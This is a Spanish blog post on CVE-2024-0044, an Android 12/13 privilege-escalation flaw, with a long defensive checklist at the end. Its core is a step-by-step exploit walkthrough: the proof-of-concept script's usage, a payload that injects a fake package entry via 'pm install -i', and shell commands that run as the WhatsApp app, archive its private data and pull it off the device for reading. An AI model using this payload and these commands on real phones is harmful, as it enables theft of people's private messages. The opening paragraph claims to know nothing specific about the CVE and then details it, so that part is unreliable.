La vulnerabilidad CVE-2024-0044 afecta a Android

Deja un comentario La vulnerabilidad CVE-2024-0044 afecta a Android Informatica, Seguridad Informatica
Spread the love
Listen to this article

CVE-2024-0044 es una vulnerabilidad específica identificada en ciertos dispositivos o software. Sin información adicional, no puedo proporcionar detalles específicos sobre esta vulnerabilidad. Sin embargo, aquí hay un enfoque general para investigar una vulnerabilidad CVE:

  1. Identificación de la vulnerabilidad:
  • El CVE (Common Vulnerabilities and Exposures) es un sistema de identificación de vulnerabilidades que asigna un número único a cada vulnerabilidad conocida.
  • CVE-2024-0044 es un número específico asignado a una vulnerabilidad particular.
  1. Impacto de la vulnerabilidad:
  • Una vez que se identifica una vulnerabilidad, se investiga para comprender qué tipo de acciones puede realizar un atacante explotando esta vulnerabilidad. Esto puede incluir:
    • Ejecución remota de código (RCE)
    • Escalada de privilegios
    • Filtración de información sensible
    • Denegación de servicio (DoS)
    • Control total del dispositivo afectado
  1. Dispositivos vulnerables:
  • La vulnerabilidad puede afectar a diferentes dispositivos, dependiendo del software o hardware en el que se encuentra.
  • Puede incluir sistemas operativos, aplicaciones, dispositivos IoT, routers, servidores, etc.

Para obtener información específica sobre CVE-2024-0044, sería necesario consultar la base de datos oficial de CVE o los informes de seguridad de los fabricantes de los dispositivos o software afectados. Aquí te dejo los pasos para buscar esta información:

  1. Visitar el sitio web de la base de datos CVE:
  • Puedes ir a la página oficial de la base de datos CVE y buscar “CVE-2024-0044”.
  1. Consultar fuentes de seguridad:
  • Revisar sitios web de seguridad como NVD (National Vulnerability Database), CERT, o los informes de seguridad de los proveedores afectados.
  1. Leer los boletines de seguridad:
  • A menudo, los proveedores afectados publican boletines de seguridad que describen la vulnerabilidad, su impacto y las soluciones disponibles.

Aquí tienes los puntos clave del CVE-2024-0044 con emojis:

  • Detalle: 🔍 A la espera de análisis.
  • Descripción: 🛡️ En createSessionInternal de PackageInstallerService.java, existe una posible ejecución como cualquier aplicación debido a una validación incorrecta de la entrada. Esto podría llevar a una escalada local de privilegios sin necesidad de privilegios adicionales de ejecución. No se necesita interacción del usuario para la explotación.
  • Métricas CVSS 4.0: 📊 NIST aún no proporciona una evaluación.
  • Referencias: 🌐 Consulta los enlaces para más información:
  • Google Source
  • GitHub Security Advisory
  • Meta Security Blog
  • Android Security Bulletin
  • Enumeración de Debilidades: 🚫 CWE-75: Falta de saneamiento de elementos especiales en un plano diferente (Inyección de elementos especiales).

Explicación del exploit

cve_2024_0044

CVE-2024-0044: Vulnerabilidad de Escalada de Privilegios en Android

Descripción: CVE-2024-0044 es una vulnerabilidad de alta severidad encontrada en la función createSessionInternal del archivo PackageInstallerService.java, afectando a las versiones 12 y 13 de Android. Esta vulnerabilidad permite a un atacante realizar un ataque de “run-as any app”, lo que conduce a una escalada de privilegios local sin requerir interacción del usuario. El problema surge debido a una validación de entrada incorrecta dentro de la función createSessionInternal. Un atacante puede explotar esto manipulando el proceso de creación de sesión, obteniendo potencialmente acceso no autorizado a datos sensibles y realizando acciones no autorizadas en el dispositivo afectado.

  • Descubrimiento: La vulnerabilidad fue descubierta por Meta Security.
  • Prueba de Concepto: La prueba de concepto fue resumida y compartida por Tiny Hack.
  • Parche de Seguridad: Los detalles sobre el parche de seguridad se pueden encontrar en el Boletín de Seguridad de Android.

Prerrequisitos

  1. Habilitar la depuración USB en tu teléfono móvil y conectarlo a tu máquina usando un cable USB o depuración inalámbrica.
  2. Descargar cualquier APK a tu máquina, puedes usar F-DROID.

Cómo usar la herramienta

El script cve_2024_0044.py proporciona una interfaz para explotar esta vulnerabilidad. A continuación se muestra el uso del script:

python3 cve_2024_0044.py -h
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)
  • -P se usa para especificar el nombre del paquete de destino que deseas ejecutar.
  • -A se usa para especificar el archivo APK que deseas cargar en el dispositivo.

Explotación

Para ejecutar la herramienta:

python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

Esto generará un archivo payload.txt con el siguiente contenido:

PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

Conexión y Ejecución del Payload

  1. Conéctate a tu dispositivo usando adb shell y pega el payload:
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success
  1. Obtén los datos de WhatsApp usando los siguientes comandos:
pixel:/ $ mkdir /data/local/tmp/wa/
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp
  • Crear un directorio temporal: mkdir /data/local/tmp/wa/
  • Crear un archivo tar como marcador de posición: touch /data/local/tmp/wa/wa.tar
  • Establecer permisos amplios: chmod -R 0777 /data/local/tmp/wa/
  • Cambiar el contexto del usuario: run-as victim
  • Archivar los datos de la aplicación: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp
  1. Finalmente, extrae los datos:
adb pull /data/local/tmp/wa/wa.tar

Puedes extraer los datos usando 7z o cualquier otra herramienta de extracción.

Conversión de Datos

Para convertir los datos de WhatsApp a un formato legible, puedes usar Whatsapp Chat Exporter para convertir los chats a HTML.

Resumen

CVE-2024-0044 permite a un atacante explotar la validación incorrecta en Android 12 y 13 para escalar privilegios localmente y acceder a datos sensibles sin necesidad de interacción del usuario. La explotación de esta vulnerabilidad puede llevarse a cabo utilizando un script específico que manipula la creación de sesiones para ejecutar comandos con privilegios elevados.

Si un atacante logra vulnerar un dispositivo, hay muchas acciones peligrosas que podría llevar a cabo. Aquí hay una lista de las 20 cosas más peligrosas que podría hacer, junto con las medidas para protegerte:

20 Cosas Peligrosas que un Atacante Podría Hacer:

  1. Robo de Información Personal: Obtener datos personales como nombres, direcciones, números de seguro social y datos bancarios.
  2. Acceso a Cuentas Bancarias: Acceder y transferir dinero desde cuentas bancarias vinculadas al dispositivo.
  3. Control Remoto del Dispositivo: Tomar control remoto del dispositivo, permitiendo al atacante ejecutar cualquier acción.
  4. Instalación de Malware: Instalar malware adicional como keyloggers, spyware o ransomware.
  5. Interceptación de Comunicaciones: Interceptar y leer mensajes de texto, correos electrónicos y otras comunicaciones.
  6. Acceso a Cámaras y Micrófonos: Encender cámaras y micrófonos para espiar.
  7. Secuestro de Cuentas en Redes Sociales: Tomar control de cuentas de redes sociales para difundir desinformación o spam.
  8. Robo de Credenciales: Capturar nombres de usuario y contraseñas para otros servicios.
  9. Manipulación de Archivos: Eliminar, cifrar o modificar archivos importantes en el dispositivo.
  10. Uso de Dispositivo como Botnet: Utilizar el dispositivo como parte de una botnet para ataques DDoS.
  11. Acceso a Historial de Navegación: Revisar el historial de navegación para obtener más información sobre los hábitos y preferencias del usuario.
  12. Acceso a Aplicaciones de Pago: Usar aplicaciones de pago como Google Pay o Apple Pay para realizar transacciones fraudulentas.
  13. Monitoreo de Localización: Rastrear la ubicación en tiempo real del dispositivo.
  14. Suplantación de Identidad: Usar la identidad del usuario para cometer fraudes.
  15. Captura de Sesiones Activas: Tomar el control de sesiones activas en aplicaciones web.
  16. Acceso a Contactos: Extraer información de contactos y enviarla a terceros.
  17. Manipulación de Configuraciones del Sistema: Cambiar configuraciones del sistema para facilitar ataques futuros.
  18. Exfiltración de Datos: Transferir datos sensibles a servidores controlados por el atacante.
  19. Manipulación de Dispositivos IoT Conectados: Controlar otros dispositivos IoT conectados en la red doméstica.
  20. Desactivación de Funciones de Seguridad: Desactivar antivirus, firewalls y otras medidas de seguridad para facilitar futuros ataques.

Medidas de Protección:

  1. Mantener el Software Actualizado: Asegúrate de que el sistema operativo y todas las aplicaciones estén actualizadas con los últimos parches de seguridad.
  2. Usar Antivirus y Antimalware: Instalar y mantener actualizados programas antivirus y antimalware.
  3. Habilitar Autenticación de Dos Factores (2FA): Activar 2FA en todas las cuentas importantes.
  4. Utilizar Contraseñas Fuertes y Únicas: Crear contraseñas seguras y diferentes para cada cuenta.
  5. Deshabilitar USB Debugging: Mantener deshabilitada la depuración USB excepto cuando sea necesario.
  6. Revisar Permisos de Aplicaciones: Verificar y restringir los permisos de aplicaciones a lo estrictamente necesario.
  7. Cifrar Datos Sensibles: Usar cifrado para proteger datos sensibles almacenados en el dispositivo.
  8. Evitar Redes Wi-Fi Públicas: No conectar el dispositivo a redes Wi-Fi públicas no seguras.
  9. Hacer Copias de Seguridad Regulares: Realizar copias de seguridad frecuentes de datos importantes.
  10. Configurar un Firewall Personal: Usar un firewall para monitorear y controlar el tráfico de red.
  11. Desinstalar Aplicaciones Innecesarias: Eliminar aplicaciones que no se usan para reducir la superficie de ataque.
  12. Monitorizar el Tráfico de Red: Utilizar herramientas para monitorear el tráfico de red en busca de actividades sospechosas.
  13. Usar VPN: Conectarse a Internet a través de una VPN segura.
  14. Deshabilitar Funcionalidades No Utilizadas: Desactivar funciones del sistema que no se utilizan, como Bluetooth o NFC.
  15. Revisar Configuraciones de Seguridad del Navegador: Configurar el navegador para máxima seguridad, evitando plugins inseguros.
  16. Formación en Seguridad: Educarse y educar a los demás sobre las mejores prácticas de seguridad.
  17. Instalar Apps Solo de Fuentes Confiables: Descargar aplicaciones únicamente de tiendas oficiales como Google Play o Apple App Store.
  18. Revisar Actividad de Cuentas: Monitorear las cuentas en busca de actividades inusuales o no autorizadas.
  19. Implementar Políticas de Seguridad en la Empresa: Si es un dispositivo de trabajo, seguir las políticas de seguridad de la empresa.
  20. Mantenerse Informado sobre Nuevas Amenazas: Estar al tanto de nuevas vulnerabilidades y amenazas para tomar medidas proactivas.
0 0 votos
Article Rating
Suscribir
Notificar de
guest
0 Comments
Comentarios en línea
Ver todos los comentarios